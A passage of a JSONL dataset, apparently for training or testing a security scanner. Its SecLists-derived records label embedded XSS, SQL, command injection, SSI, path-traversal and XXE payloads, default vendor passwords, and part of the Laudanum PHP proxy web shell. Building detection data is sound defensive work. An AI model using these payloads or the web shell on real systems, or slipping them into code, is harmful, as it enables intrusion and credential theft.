"cmd"}}]} {"id": "seclists_02827", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"script_url\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"script_url\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02828", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_02829", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: x' or name()='username' or 'x'='y", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' or name()='username' or 'x'='y", "injection_type": "cmd"}}]} {"id": "seclists_02830", "source": "seclists", "source_license": "MIT", "text": "filename=%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F", "injection_type": "cmd"}}]} {"id": "seclists_02831", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_02832", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = and 1 in (select var from temp)--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "and 1 in (select var from temp)--", "injection_type": "SQL"}}]} {"id": "seclists_02833", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x00003C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x00003C", "injection_type": "cmd"}}]} {"id": "seclists_02834", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY//", "injection_type": "cmd"}}]} {"id": "seclists_02835", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Protocol resolution in script tags</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Protocol resolution in script tags", "injection_type": "XSS"}}]} {"id": "seclists_02836", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02837", "source": "seclists", "source_license": "MIT", "text": "password: packer\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "packer"}}]} {"id": "seclists_02838", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n', $where: '1 == 1'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "', $where: '1 == 1'", "injection_type": "NoSQL"}}]} {"id": "seclists_02839", "source": "seclists", "source_license": "MIT", "text": "password: mushroom\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mushroom"}}]} {"id": "seclists_02840", "source": "seclists", "source_license": "MIT", "text": "password: secrets\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "secrets"}}]} {"id": "seclists_02841", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Novell,GUEST,GUEST,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,GUEST,GUEST,"}}]} {"id": "seclists_02842", "source": "seclists", "source_license": "MIT", "text": "filename=0xfffffff", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0xfffffff", "injection_type": "cmd"}}]} {"id": "seclists_02843", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/../../../../../../../../../../etc/shadow^^ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../etc/shadow^^", "injection_type": "cmd"}}]} {"id": "seclists_02844", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=2323\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "2323"}}]} {"id": "seclists_02845", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '21 %';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "21 %", "injection_type": "SQL"}}]} {"id": "seclists_02846", "source": "seclists", "source_license": "MIT", "text": "filename=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_02847", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><noscript ondblclick=\"alert(1)\">test</noscript></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noscript ondblclick=\"alert(1)\">test</noscript>", "injection_type": "XSS"}}]} {"id": "seclists_02848", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20NFRBHV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_02849", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#exec cmd=\"ls\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#exec cmd=\"ls\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02850", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<h1 onbeforecopy=\"alert(1)\" contenteditable>test</h1>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<h1 onbeforecopy=\"alert(1)\" contenteditable>test</h1>", "injection_type": "XSS"}}]} {"id": "seclists_02851", "source": "seclists", "source_license": "MIT", "text": "filename=;id\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";id\\n", "injection_type": "cmd"}}]} {"id": "seclists_02852", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02853", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:daddy", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "daddy"}}]} {"id": "seclists_02854", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin') or ('1'='1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or ('1'='1", "injection_type": "SQL"}}]} {"id": "seclists_02855", "source": "seclists", "source_license": "MIT", "text": "password: picher\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "picher"}}]} {"id": "seclists_02856", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<wbr onmouseup=\"alert(1)\">test</wbr> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<wbr onmouseup=\"alert(1)\">test</wbr>", "injection_type": "XSS"}}]} {"id": "seclists_02857", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|id| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|id|", "injection_type": "cmd"}}]} {"id": "seclists_02858", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'bfilename';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "bfilename", "injection_type": "SQL"}}]} {"id": "seclists_02859", "source": "seclists", "source_license": "MIT", "text": "password: AWARD,<BLANK>,wodj,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AWARD,<BLANK>,wodj,"}}]} {"id": "seclists_02860", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02861", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Xerox,admin,x-admin,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Xerox,admin,x-admin,"}}]} {"id": "seclists_02862", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></mark></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></mark>", "injection_type": "XSS"}}]} {"id": "seclists_02863", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\x3D \\x3B'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x3D \\x3B'", "injection_type": "cmd"}}]} {"id": "seclists_02864", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:UNIX,web,web,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,web,web,"}}]} {"id": "seclists_02865", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd", "injection_type": "cmd"}}]} {"id": "seclists_02866", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Oracle,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,"}}]} {"id": "seclists_02867", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><x %6Fnxxx=1</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x %6Fnxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02868", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\" or sleep(__TIME__)#';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or sleep(__TIME__)#", "injection_type": "SQL"}}]} {"id": "seclists_02869", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02870", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Sharp,<N/A>,sysadm,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sharp,<N/A>,sysadm,"}}]} {"id": "seclists_02871", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <A HREF=\"http://6&#09;6.000146.0x7.147/\">XSS</A>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"http://6&#09;6.000146.0x7.147/\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_02872", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=||/usr/bin/id; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||/usr/bin/id;", "injection_type": "cmd"}}]} {"id": "seclists_02873", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x/onxxx=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x/onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02874", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = '; exec master..xp_cmdshell", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'; exec master..xp_cmdshell", "injection_type": "SQL"}}]} {"id": "seclists_02875", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20echo%20VAAVBM$((40%2B49))$(echo%20VAAVBM)VAAVBM&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20VAAVBM$((40%2B49))$(echo%20VAAVBM)VAAVBM&", "injection_type": "cmd"}}]} {"id": "seclists_02876", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: URI exploits, injection, general, obfuscated, internet explorer</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: URI exploits, injection, general, obfuscated, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_02877", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", "injection_type": "XSS"}}]} {"id": "seclists_02878", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Backslash-obfuscated XBL injection - variant 1</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Backslash-obfuscated XBL injection - variant 1", "injection_type": "XSS"}}]} {"id": "seclists_02879", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><x onxxx=1 onxxx=1</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onxxx=1 onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02880", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02881", "source": "seclists", "source_license": "MIT", "text": "username=union select * from users where login = char ...&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "union select * from users where login = char ...", "injection_type": "SQL"}}]} {"id": "seclists_02882", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=') or ('x')=('x HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "') or ('x')=('x", "injection_type": "SQL"}}]} {"id": "seclists_02883", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><i id=x tabindex=1 onfocus=alert(1)></i></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<i id=x tabindex=1 onfocus=alert(1)></i>", "injection_type": "XSS"}}]} {"id": "seclists_02884", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26", "injection_type": "cmd"}}]} {"id": "seclists_02885", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<title onbeforecut=\"alert(1)\" contenteditable>test</title>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<title onbeforecut=\"alert(1)\" contenteditable>test</title>", "injection_type": "XSS"}}]} {"id": "seclists_02886", "source": "seclists", "source_license": "MIT", "text": "<?php\nini_set('session.use_cookies', '0');\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file allows browsing of the file system.\n*** Written by Tim Medin <tim@counterhack.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page\n// figure out how to reuse sessionid from the remote site\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"19.168.2.16\", \"192.168.1.100\",\"127.0.0.1\",\"192.168.10.129\",\"192.168.10.1\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Proxy</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\nfunction geturlarray($u) {\n // creates the url array, addes a scheme if it is missing and retries parsing\n $o = parse_url($u);\n if (!isset($o[\"scheme\"])) { $o = parse_url(\"http://\" . $u); }\n if (!isset($o[\"path\"])) { $o[\"path\"] = \"/\"; }\n return $o;\n}\n\nfunction buildurl ($u) {\n // build the url from the url array\n // this is used because the built in function isn't \n // avilable in all installs of php\n if (!isset($u[\"host\"])) { return null; }\n\n $s = isset($u[\"scheme\"]) ? $u[\"scheme\"] : \"http\";\n $s .= \"://\" . $u[\"host\"];\n $s .= isset($u[\"port\"]) ? \":\" . $", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "proxy.php"}}]} {"id": "seclists_02887", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &LT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&LT", "injection_type": "cmd"}}]} {"id": "seclists_02888", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, internet explorer</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_02889", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=jedi\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "jedi"}}]} {"id": "seclists_02890", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'select name from syscolumns where id = (sele ...';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "select name from syscolumns where id = (sele ...", "injection_type": "SQL"}}]} {"id": "seclists_02891", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x onmouseover=alert(1)>hover this!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onmouseover=alert(1)>hover this!", "injection_type": "XSS"}}]} {"id": "seclists_02892", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=+ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "+", "injection_type": "cmd"}}]} {"id": "seclists_02893", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..%c0%af", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%c0%af", "injection_type": "cmd"}}]} {"id": "seclists_02894", "source": "seclists", "source_license": "MIT", "text": "password: Hewlett-Packard,MGR,RJE,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,MGR,RJE,"}}]} {"id": "seclists_02895", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<li onbeforecopy=\"alert(1)\" contenteditable>test</li> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<li onbeforecopy=\"alert(1)\" contenteditable>test</li>", "injection_type": "XSS"}}]} {"id": "seclists_02896", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02897", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i", "injection_type": "cmd"}}]} {"id": "seclists_02898", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \"*\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"*\"", "injection_type": "SQL"}}]} {"id": "seclists_02899", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM \"http://x.x.x.x:22/\"> %dtd;]><xxx/>]]></foo></soap:Body>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM 